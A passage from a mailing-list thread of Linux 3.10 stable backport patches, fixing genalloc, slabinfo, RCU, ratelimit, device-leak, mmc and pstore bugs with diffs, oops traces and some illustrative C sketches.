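		if (start_bit >= end_bit)
			continue;	/* search failed, try the next chunk */
		for (i = 0; i < nbits; i++)
			chunks[c].bits[start_bit + i] = 1;
		return c * CHUNK_BITS + start_bit;
	}
	return -1;
}
```

With a fragmented first chunk and an empty second chunk, the old behaviour
starts the second search at the value left over from the failed first
search, so it sees an empty range and gives up.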

Fixes: 7f184275aa30 ("lib, Make gen_pool memory allocator lockless")
Link: http://lkml.kernel.org/r/1477420604-28918-1-git-send-email-danielmentz@google.com
Signed-off-by: Daniel Mentz <danielmentz@google.com>
Reviewed-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
Acked-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 lib/genalloc.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/genalloc.c b/lib/genalloc.c
index 2a39bf6..ac5fba9 100644
--- a/lib/genalloc.c
+++ b/lib/genalloc.c
@@ -273,7 +273,7 @@ unsigned long gen_pool_alloc(struct gen_pool *pool, size_t size)
 	struct gen_pool_chunk *chunk;
 	unsigned long addr = 0;
 	int order = pool->min_alloc_order;
-	int nbits, start_bit = 0, end_bit, remain;
+	int nbits, start_bit, end_bit, remain;
 
 #ifndef CONFIG_ARCH_HAVE_NMI_SAFE_CMPXCHG
 	BUG_ON(in_nmi());
@@ -288,6 +288,7 @@ unsigned long gen_pool_alloc(struct gen_pool *pool, size_t size)
 		if (size > atomic_read(&chunk->avail))
 			continue;
 
+		start_bit = 0;
 		end_bit = chunk_size(chunk) >> order;
 retry:
 		start_bit = pool->algo(chunk->bits, end_bit, start_bit, nbits,
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 286/319] tools/vm/slabinfo: fix an unintentional printf
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (184 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 285/319] lib/genalloc.c: start search from start of chunk Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 287/319] rcu: Fix soft lockup for rcu_nocb_kthread Willy Tarreau
                   ` (32 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Dan Carpenter, Sergey Senozhatsky, Colin Ian King, Laura Abbott,
	Andrew Morton, Linus Torvalds, Willy Tarreau

From: Dan Carpenter <dan.carpenter@oracle.com>

commit 2d6a4d64812bb12dda53704943b61a7496d02098 upstream.

The curly braces are missing here so we print stuff unintentionally.
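
For illustration, this is how the compiler groups the statements with and
without the braces.  It is a sketch only: lines_unbraced() and
lines_braced() are hypothetical helpers that count output lines instead of
calling printf().

```c
/* Old shape: only the first statement belongs to the if. */
static int lines_unbraced(unsigned long fail, unsigned long cpu_fail)
{
	int lines = 0;

	if (fail || cpu_fail)
		lines++;	/* header line */
	lines++;		/* detail line: outside the if, always runs */
	return lines;
}

/* Fixed shape: both statements are guarded. */
static int lines_braced(unsigned long fail, unsigned long cpu_fail)
{
	int lines = 0;

	if (fail || cpu_fail) {
		lines++;	/* header line */
		lines++;	/* detail line */
	}
	return lines;
}
```

With both counters at zero the unbraced form still emits the detail line,
which is the unintended output.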

Fixes: 9da4714a2d44 ('slub: slabinfo update for cmpxchg handling')
Link: http://lkml.kernel.org/r/20160715211243.GE19522@mwanda
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Acked-by: Christoph Lameter <cl@linux.com>
Cc: Sergey Senozhatsky <sergey.senozhatsky@gmail.com>
Cc: Colin Ian King <colin.king@canonical.com>
Cc: Laura Abbott <labbott@fedoraproject.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 tools/vm/slabinfo.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/tools/vm/slabinfo.c b/tools/vm/slabinfo.c
index 808d5a9..bcc6125 100644
--- a/tools/vm/slabinfo.c
+++ b/tools/vm/slabinfo.c
@@ -493,10 +493,11 @@ static void slab_stats(struct slabinfo *s)
 			s->alloc_node_mismatch, (s->alloc_node_mismatch * 100) / total);
 	}
 
-	if (s->cmpxchg_double_fail || s->cmpxchg_double_cpu_fail)
+	if (s->cmpxchg_double_fail || s->cmpxchg_double_cpu_fail) {
 		printf("\nCmpxchg_double Looping\n------------------------\n");
 		printf("Locked Cmpxchg Double redos   %lu\nUnlocked Cmpxchg Double redos %lu\n",
 			s->cmpxchg_double_fail, s->cmpxchg_double_cpu_fail);
+	}
 }
 
 static void report(struct slabinfo *s)
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 287/319] rcu: Fix soft lockup for rcu_nocb_kthread
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (185 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 286/319] tools/vm/slabinfo: fix an unintentional printf Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 288/319] ratelimit: fix bug in time interval by resetting right begin time Willy Tarreau
                   ` (31 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Ding Tianhong, Paul E . McKenney, Dhaval Giani, Jiri Slaby,
	Willy Tarreau

From: Ding Tianhong <dingtianhong@huawei.com>

commit bedc1969150d480c462cdac320fa944b694a7162 upstream.

Carrying out the following steps results in a softlockup in the
RCU callback-offload (rcuo) kthreads:

1. Connect to ixgbevf, and set the speed to 10Gb/s.
2. Use ifconfig to bring the nic up and down repeatedly.

[  317.005148] IPv6: ADDRCONF(NETDEV_CHANGE): eth2: link becomes ready
[  368.106005] BUG: soft lockup - CPU#1 stuck for 22s! [rcuos/1:15]
[  368.106005] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011
[  368.106005] task: ffff88057dd8a220 ti: ffff88057dd9c000 task.ti: ffff88057dd9c000
[  368.106005] RIP: 0010:[<ffffffff81579e04>]  [<ffffffff81579e04>] fib_table_lookup+0x14/0x390
[  368.106005] RSP: 0018:ffff88061fc83ce8  EFLAGS: 00000286
[  368.106005] RAX: 0000000000000001 RBX: 00000000020155c0 RCX: 0000000000000001
[  368.106005] RDX: ffff88061fc83d50 RSI: ffff88061fc83d70 RDI: ffff880036d11a00
[  368.106005] RBP: ffff88061fc83d08 R08: 0000000000000001 R09: 0000000000000000
[  368.106005] R10: ffff880036d11a00 R11: ffffffff819e0900 R12: ffff88061fc83c58
[  368.106005] R13: ffffffff816154dd R14: ffff88061fc83d08 R15: 00000000020155c0
[  368.106005] FS:  0000000000000000(0000) GS:ffff88061fc80000(0000) knlGS:0000000000000000
[  368.106005] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  368.106005] CR2: 00007f8c2aee9c40 CR3: 000000057b222000 CR4: 00000000000407e0
[  368.106005] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  368.106005] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[  368.106005] Stack:
[  368.106005]  00000000010000c0 ffff88057b766000 ffff8802e380b000 ffff88057af03e00
[  368.106005]  ffff88061fc83dc0 ffffffff815349a6 ffff88061fc83d40 ffffffff814ee146
[  368.106005]  ffff8802e380af00 00000000e380af00 ffffffff819e0900 020155c0010000c0
[  368.106005] Call Trace:
[  368.106005]  <IRQ>
[  368.106005]
[  368.106005]  [<ffffffff815349a6>] ip_route_input_noref+0x516/0xbd0
[  368.106005]  [<ffffffff814ee146>] ? skb_release_data+0xd6/0x110
[  368.106005]  [<ffffffff814ee20a>] ? kfree_skb+0x3a/0xa0
[  368.106005]  [<ffffffff8153698f>] ip_rcv_finish+0x29f/0x350
[  368.106005]  [<ffffffff81537034>] ip_rcv+0x234/0x380
[  368.106005]  [<ffffffff814fd656>] __netif_receive_skb_core+0x676/0x870
[  368.106005]  [<ffffffff814fd868>] __netif_receive_skb+0x18/0x60
[  368.106005]  [<ffffffff814fe4de>] process_backlog+0xae/0x180
[  368.106005]  [<ffffffff814fdcb2>] net_rx_action+0x152/0x240
[  368.106005]  [<ffffffff81077b3f>] __do_softirq+0xef/0x280
[  368.106005]  [<ffffffff8161619c>] call_softirq+0x1c/0x30
[  368.106005]  <EOI>
[  368.106005]
[  368.106005]  [<ffffffff81015d95>] do_softirq+0x65/0xa0
[  368.106005]  [<ffffffff81077174>] local_bh_enable+0x94/0xa0
[  368.106005]  [<ffffffff81114922>] rcu_nocb_kthread+0x232/0x370
[  368.106005]  [<ffffffff81098250>] ? wake_up_bit+0x30/0x30
[  368.106005]  [<ffffffff811146f0>] ? rcu_start_gp+0x40/0x40
[  368.106005]  [<ffffffff8109728f>] kthread+0xcf/0xe0
[  368.106005]  [<ffffffff810971c0>] ? kthread_create_on_node+0x140/0x140
[  368.106005]  [<ffffffff816147d8>] ret_from_fork+0x58/0x90
[  368.106005]  [<ffffffff810971c0>] ? kthread_create_on_node+0x140/0x140

==================================cut here==============================

It turns out that the rcuos callback-offload kthread is busy processing
a very large quantity of RCU callbacks, and it is not relinquishing the
CPU while doing so.  This commit therefore adds a cond_resched_rcu_qs()
within the loop to allow other tasks to run.

[js] use only cond_resched() in 3.12

Signed-off-by: Ding Tianhong <dingtianhong@huawei.com>
[ paulmck: Substituted cond_resched_rcu_qs for cond_resched. ]
Signed-off-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com>
Cc: Dhaval Giani <dhaval.giani@oracle.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 kernel/rcutree_plugin.h | 1 +
 1 file changed, 1 insertion(+)

diff --git a/kernel/rcutree_plugin.h b/kernel/rcutree_plugin.h
index 3db5a37..468786b 100644
--- a/kernel/rcutree_plugin.h
+++ b/kernel/rcutree_plugin.h
@@ -2243,6 +2243,7 @@ static int rcu_nocb_kthread(void *arg)
 				cl++;
 			c++;
 			local_bh_enable();
+			cond_resched();
 			list = next;
 		}
 		trace_rcu_batch_end(rdp->rsp->name, c, !!list, 0, 0, 1);
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 288/319] ratelimit: fix bug in time interval by resetting right begin time
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (186 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 287/319] rcu: Fix soft lockup for rcu_nocb_kthread Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 289/319] mfd: core: Fix device reference leak in mfd_clone_cell Willy Tarreau
                   ` (30 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Jaewon Kim, Andrew Morton, Linus Torvalds, Willy Tarreau

From: Jaewon Kim <jaewon31.kim@samsung.com>

commit c2594bc37f4464bc74f2c119eb3269a643400aa0 upstream.

rs->begin in ratelimit is set in two cases.
 1) when rs->begin was not initialized
 2) when rs->interval was passed

For case #2, current ratelimit sets the begin to 0.  This incurs
improper suppression.  The begin value will be set in the next ratelimit
call by 1).  Then the time interval check will be always false, and
rs->printed will not be initialized.  Although enough time passed,
ratelimit may return 0 if rs->printed is not less than rs->burst.  To
reset interval properly, begin should be jiffies rather than 0.

For example, with the code below:

    static DEFINE_RATELIMIT_STATE(mylimit, 1, 1);
    for (i = 1; i <= 10; i++) {
        if (__ratelimit(&mylimit))
            printk("ratelimit test count %d\n", i);
        msleep(3000);
    }

The test result with the current code shows suppression even though there is a 3-second sleep.

  [  78.391148] ratelimit test count 1
  [  81.295988] ratelimit test count 2
  [  87.315981] ratelimit test count 4
  [  93.336267] ratelimit test count 6
  [  99.356031] ratelimit test count 8
  [ 105.376367] ratelimit test count 10
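
The pattern in the log above (every second message lost after the first
two) can be reproduced outside the kernel.  What follows is only a
userspace sketch of the window logic, not the kernel code: struct
rl_model, rl_allow() and rl_replay() are hypothetical names, `now'
stands in for jiffies, and the `fixed' flag selects between the old
reset (begin = 0) and the new one (begin = now).

```c
#include <stdbool.h>

/* Hypothetical userspace model of the ratelimit state; not the kernel type. */
struct rl_model {
	unsigned long interval;	/* window length in ticks */
	int burst;		/* messages allowed per window */
	int printed;		/* messages emitted in the current window */
	unsigned long begin;	/* start of the current window, 0 = unset */
};

/*
 * Model of the window check.  Returns true when the caller may print.
 * `now` must be non-zero, because 0 doubles as the "unset" marker.
 */
static bool rl_allow(struct rl_model *rs, unsigned long now, bool fixed)
{
	if (!rs->begin)
		rs->begin = now;

	/* Window expired: start a new one. */
	if (now > rs->begin + rs->interval) {
		rs->begin = fixed ? now : 0;	/* old code reset this to 0 */
		rs->printed = 0;
	}

	if (rs->burst > rs->printed) {
		rs->printed++;
		return true;
	}
	return false;
}

/* Replays the test from the commit message: 10 calls, 3 ticks apart. */
static int rl_replay(bool fixed)
{
	struct rl_model rs = { .interval = 1, .burst = 1 };
	int allowed = 0;

	for (int i = 0; i < 10; i++)
		if (rl_allow(&rs, 10 + 3UL * i, fixed))
			allowed++;
	return allowed;
}
```

In this model, the old reset lets through calls 1, 2, 4, 6, 8 and 10,
matching the log, because every call that finds begin == 0 re-arms the
window without clearing rs->printed.  With begin = now, all ten calls
pass.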

Signed-off-by: Jaewon Kim <jaewon31.kim@samsung.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 lib/ratelimit.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/ratelimit.c b/lib/ratelimit.c
index 40e03ea..2c5de86 100644
--- a/lib/ratelimit.c
+++ b/lib/ratelimit.c
@@ -49,7 +49,7 @@ int ___ratelimit(struct ratelimit_state *rs, const char *func)
 		if (rs->missed)
 			printk(KERN_WARNING "%s: %d callbacks suppressed\n",
 				func, rs->missed);
-		rs->begin   = 0;
+		rs->begin   = jiffies;
 		rs->printed = 0;
 		rs->missed  = 0;
 	}
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 289/319] mfd: core: Fix device reference leak in mfd_clone_cell
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (187 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 288/319] ratelimit: fix bug in time interval by resetting right begin time Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 290/319] PM / sleep: fix device reference leak in test_suspend Willy Tarreau
                   ` (29 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Johan Hovold, Lee Jones, Willy Tarreau

From: Johan Hovold <johan@kernel.org>

commit 722f191080de641f023feaa7d5648caf377844f5 upstream.

Make sure to drop the reference taken by bus_find_device_by_name()
before returning from mfd_clone_cell().

Fixes: a9bbba996302 ("mfd: add platform_device sharing support for mfd")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/mfd/mfd-core.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/drivers/mfd/mfd-core.c b/drivers/mfd/mfd-core.c
index 7604f4e..af6a245 100644
--- a/drivers/mfd/mfd-core.c
+++ b/drivers/mfd/mfd-core.c
@@ -263,6 +263,8 @@ int mfd_clone_cell(const char *cell, const char **clones, size_t n_clones)
 					clones[i]);
 	}
 
+	put_device(dev);
+
 	return 0;
 }
 EXPORT_SYMBOL(mfd_clone_cell);
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 290/319] PM / sleep: fix device reference leak in test_suspend
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (188 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 289/319] mfd: core: Fix device reference leak in mfd_clone_cell Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 291/319] mmc: mxs: Initialize the spinlock prior to using it Willy Tarreau
                   ` (28 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Johan Hovold, Rafael J . Wysocki, Willy Tarreau

From: Johan Hovold <johan@kernel.org>

commit ceb75787bc75d0a7b88519ab8a68067ac690f55a upstream.

Make sure to drop the reference taken by class_find_device() after
opening the RTC device.

Fixes: 77437fd4e61f (pm: boot time suspend selftest)
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 kernel/power/suspend_test.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/kernel/power/suspend_test.c b/kernel/power/suspend_test.c
index 269b097..743615b 100644
--- a/kernel/power/suspend_test.c
+++ b/kernel/power/suspend_test.c
@@ -169,8 +169,10 @@ static int __init test_suspend(void)
 
 	/* RTCs have initialized by now too ... can we use one? */
 	dev = class_find_device(rtc_class, NULL, NULL, has_wakealarm);
-	if (dev)
+	if (dev) {
 		rtc = rtc_class_open(dev_name(dev));
+		put_device(dev);
+	}
 	if (!rtc) {
 		printk(warn_no_rtc);
 		goto done;
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 291/319] mmc: mxs: Initialize the spinlock prior to using it
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (189 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 290/319] PM / sleep: fix device reference leak in test_suspend Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 292/319] mmc: block: don't use CMD23 with very old MMC cards Willy Tarreau
                   ` (27 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Fabio Estevam, Ulf Hansson, Willy Tarreau

From: Fabio Estevam <fabio.estevam@nxp.com>

commit f91346e8b5f46aaf12f1df26e87140584ffd1b3f upstream.

An interrupt may occur right after devm_request_irq() is called and
prior to the spinlock initialization, leading to a kernel oops,
as the interrupt handler uses the spinlock.

In order to prevent this problem, move the spinlock initialization
prior to requesting the interrupts.

Fixes: e4243f13d10e (mmc: mxs-mmc: add mmc host driver for i.MX23/28)
Signed-off-by: Fabio Estevam <fabio.estevam@nxp.com>
Reviewed-by: Marek Vasut <marex@denx.de>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/mmc/host/mxs-mmc.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/mmc/host/mxs-mmc.c b/drivers/mmc/host/mxs-mmc.c
index 4278a17..f3a4232 100644
--- a/drivers/mmc/host/mxs-mmc.c
+++ b/drivers/mmc/host/mxs-mmc.c
@@ -674,13 +674,13 @@ static int mxs_mmc_probe(struct platform_device *pdev)
 
 	platform_set_drvdata(pdev, mmc);
 
+	spin_lock_init(&host->lock);
+
 	ret = devm_request_irq(&pdev->dev, irq_err, mxs_mmc_irq_handler, 0,
 			       DRIVER_NAME, host);
 	if (ret)
 		goto out_free_dma;
 
-	spin_lock_init(&host->lock);
-
 	ret = mmc_add_host(mmc);
 	if (ret)
 		goto out_free_dma;
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 292/319] mmc: block: don't use CMD23 with very old MMC cards
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (190 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 291/319] mmc: mxs: Initialize the spinlock prior to using it Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 293/319] pstore/core: drop cmpxchg based updates Willy Tarreau
                   ` (26 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Daniel Glöckner, Ulf Hansson, Willy Tarreau

From: Daniel Glöckner <dg@emlix.com>

commit 0ed50abb2d8fc81570b53af25621dad560cd49b3 upstream.

CMD23 aka SET_BLOCK_COUNT was introduced with MMC v3.1.
Older versions of the specification allowed to terminate
multi-block transfers only with CMD12.

The patch fixes the following problem:

  mmc0: new MMC card at address 0001
  mmcblk0: mmc0:0001 SDMB-16 15.3 MiB
  mmcblk0: timed out sending SET_BLOCK_COUNT command, card status 0x400900
  ...
  blk_update_request: I/O error, dev mmcblk0, sector 0
  Buffer I/O error on dev mmcblk0, logical block 0, async page read
   mmcblk0: unable to read partition table
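
As a rough illustration of the decision the patch changes, here is a
standalone sketch of the predicate.  The names card_model, use_cmd23()
and SPEC_VER_3 are made up for this example; SPEC_VER_3 mirrors
CSD_SPEC_VER_3 from the diff, and its numeric value here is an
assumption.

```c
#include <stdbool.h>

/* Stand-in for CSD_SPEC_VER_3; the value 3 is an assumption of this sketch. */
#define SPEC_VER_3 3

enum card_kind { CARD_MMC, CARD_SD };

/* Hypothetical, reduced view of the card properties that matter here. */
struct card_model {
	enum card_kind kind;
	unsigned int mmca_vsn;	/* CSD spec version field (MMC only) */
	bool sd_scr_cmd23;	/* SD card advertises CMD23 in its SCR */
};

/* Decide whether SET_BLOCK_COUNT (CMD23) may be used for this card. */
static bool use_cmd23(bool host_cmd23, const struct card_model *c)
{
	if (!host_cmd23)
		return false;
	if (c->kind == CARD_MMC)
		return c->mmca_vsn >= SPEC_VER_3;	/* the newly added check */
	return c->sd_scr_cmd23;
}
```

Before the change, the MMC branch returned true unconditionally, which
is what let CMD23 reach cards that only understand CMD12.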

Signed-off-by: Daniel Glöckner <dg@emlix.com>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/mmc/card/block.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/drivers/mmc/card/block.c b/drivers/mmc/card/block.c
index a2863b7..ce34c49 100644
--- a/drivers/mmc/card/block.c
+++ b/drivers/mmc/card/block.c
@@ -2093,7 +2093,8 @@ static struct mmc_blk_data *mmc_blk_alloc_req(struct mmc_card *card,
 	set_capacity(md->disk, size);
 
 	if (mmc_host_cmd23(card->host)) {
-		if (mmc_card_mmc(card) ||
+		if ((mmc_card_mmc(card) &&
+		     card->csd.mmca_vsn >= CSD_SPEC_VER_3) ||
 		    (mmc_card_sd(card) &&
 		     card->scr.cmds & SD_SCR_CMD23_SUPPORT))
 			md->flags |= MMC_BLK_CMD23;
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 293/319] pstore/core: drop cmpxchg based updates
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (191 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 292/319] mmc: block: don't use CMD23 with very old MMC cards Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 294/319] pstore/ram: Use memcpy_toio instead of memcpy Willy Tarreau
                   ` (25 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Sebastian Andrzej Siewior, Anton Vorontsov, Colin Cross,
	Kees Cook, Tony Luck, Rabin Vincent, Willy Tarreau

From: Sebastian Andrzej Siewior <bigeasy@linutronix.de>

commit d5a9bf0b38d2ac85c9a693c7fb851f74fd2a2494 upstream.

I have here an FPGA behind PCIe which exports SRAM which I use for
pstore. Now it seems that the FPGA no longer supports cmpxchg based
updates and writes back 0xff…ff and returns the same.  This leads to
a crash while handling a crash, rendering pstore useless.
Since I doubt that there is much benefit from using cmpxchg() here, I am
dropping this atomic access and use the spinlock based version.
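
For readers who want to see the shape of the lock-based update, here is
a userspace sketch.  It is not the kernel code: ring_model and the
ring_*() helpers are hypothetical, and a C11 atomic_flag spin loop
stands in for the raw spinlock.  The point it tries to show is that the
lock lives in ordinary memory, so the buffer itself only ever sees
plain loads and stores.

```c
#include <stdatomic.h>
#include <stddef.h>

/* Hypothetical stand-in for the persistent buffer header. */
struct ring_model {
	size_t start;		/* next write offset */
	size_t size;		/* bytes of valid data, capped at capacity */
	size_t capacity;	/* total buffer size */
};

/* The lock is in normal RAM, not in the (device-backed) buffer. */
static atomic_flag ring_lock = ATOMIC_FLAG_INIT;

static void ring_lock_acquire(void)
{
	while (atomic_flag_test_and_set_explicit(&ring_lock,
						 memory_order_acquire))
		;	/* spin until the flag was previously clear */
}

static void ring_lock_release(void)
{
	atomic_flag_clear_explicit(&ring_lock, memory_order_release);
}

/* Increase and wrap the start offset, returning the old value. */
static size_t ring_start_add(struct ring_model *r, size_t a)
{
	size_t old, new;

	ring_lock_acquire();
	old = r->start;
	new = old + a;
	while (new >= r->capacity)
		new -= r->capacity;
	r->start = new;
	ring_lock_release();

	return old;
}

/* Increase the size counter until it hits the capacity. */
static void ring_size_add(struct ring_model *r, size_t a)
{
	ring_lock_acquire();
	if (r->size < r->capacity) {
		size_t new = r->size + a;

		r->size = new > r->capacity ? r->capacity : new;
	}
	ring_lock_release();
}
```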

Cc: Anton Vorontsov <anton@enomsg.org>
Cc: Colin Cross <ccross@android.com>
Cc: Kees Cook <keescook@chromium.org>
Cc: Tony Luck <tony.luck@intel.com>
Cc: Rabin Vincent <rabinv@axis.com>
Tested-by: Rabin Vincent <rabinv@axis.com>
Signed-off-by: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
Reviewed-by: Guenter Roeck <linux@roeck-us.net>
[kees: remove "_locked" suffix since it's the only option now]
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/pstore/ram_core.c | 43 ++-----------------------------------------
 1 file changed, 2 insertions(+), 41 deletions(-)

diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c
index 0b367ef..ee3c6ec 100644
--- a/fs/pstore/ram_core.c
+++ b/fs/pstore/ram_core.c
@@ -45,43 +45,10 @@ static inline size_t buffer_start(struct persistent_ram_zone *prz)
 	return atomic_read(&prz->buffer->start);
 }
 
-/* increase and wrap the start pointer, returning the old value */
-static size_t buffer_start_add_atomic(struct persistent_ram_zone *prz, size_t a)
-{
-	int old;
-	int new;
-
-	do {
-		old = atomic_read(&prz->buffer->start);
-		new = old + a;
-		while (unlikely(new >= prz->buffer_size))
-			new -= prz->buffer_size;
-	} while (atomic_cmpxchg(&prz->buffer->start, old, new) != old);
-
-	return old;
-}
-
-/* increase the size counter until it hits the max size */
-static void buffer_size_add_atomic(struct persistent_ram_zone *prz, size_t a)
-{
-	size_t old;
-	size_t new;
-
-	if (atomic_read(&prz->buffer->size) == prz->buffer_size)
-		return;
-
-	do {
-		old = atomic_read(&prz->buffer->size);
-		new = old + a;
-		if (new > prz->buffer_size)
-			new = prz->buffer_size;
-	} while (atomic_cmpxchg(&prz->buffer->size, old, new) != old);
-}
-
 static DEFINE_RAW_SPINLOCK(buffer_lock);
 
 /* increase and wrap the start pointer, returning the old value */
-static size_t buffer_start_add_locked(struct persistent_ram_zone *prz, size_t a)
+static size_t buffer_start_add(struct persistent_ram_zone *prz, size_t a)
 {
 	int old;
 	int new;
@@ -101,7 +68,7 @@ static size_t buffer_start_add_locked(struct persistent_ram_zone *prz, size_t a)
 }
 
 /* increase the size counter until it hits the max size */
-static void buffer_size_add_locked(struct persistent_ram_zone *prz, size_t a)
+static void buffer_size_add(struct persistent_ram_zone *prz, size_t a)
 {
 	size_t old;
 	size_t new;
@@ -122,9 +89,6 @@ exit:
 	raw_spin_unlock_irqrestore(&buffer_lock, flags);
 }
 
-static size_t (*buffer_start_add)(struct persistent_ram_zone *, size_t) = buffer_start_add_atomic;
-static void (*buffer_size_add)(struct persistent_ram_zone *, size_t) = buffer_size_add_atomic;
-
 static void notrace persistent_ram_encode_rs8(struct persistent_ram_zone *prz,
 	uint8_t *data, size_t len, uint8_t *ecc)
 {
@@ -426,9 +390,6 @@ static void *persistent_ram_iomap(phys_addr_t start, size_t size,
 		return NULL;
 	}
 
-	buffer_start_add = buffer_start_add_locked;
-	buffer_size_add = buffer_size_add_locked;
-
 	if (memtype)
 		va = ioremap(start, size);
 	else
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 294/319] pstore/ram: Use memcpy_toio instead of memcpy
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (192 preceding siblings ...)
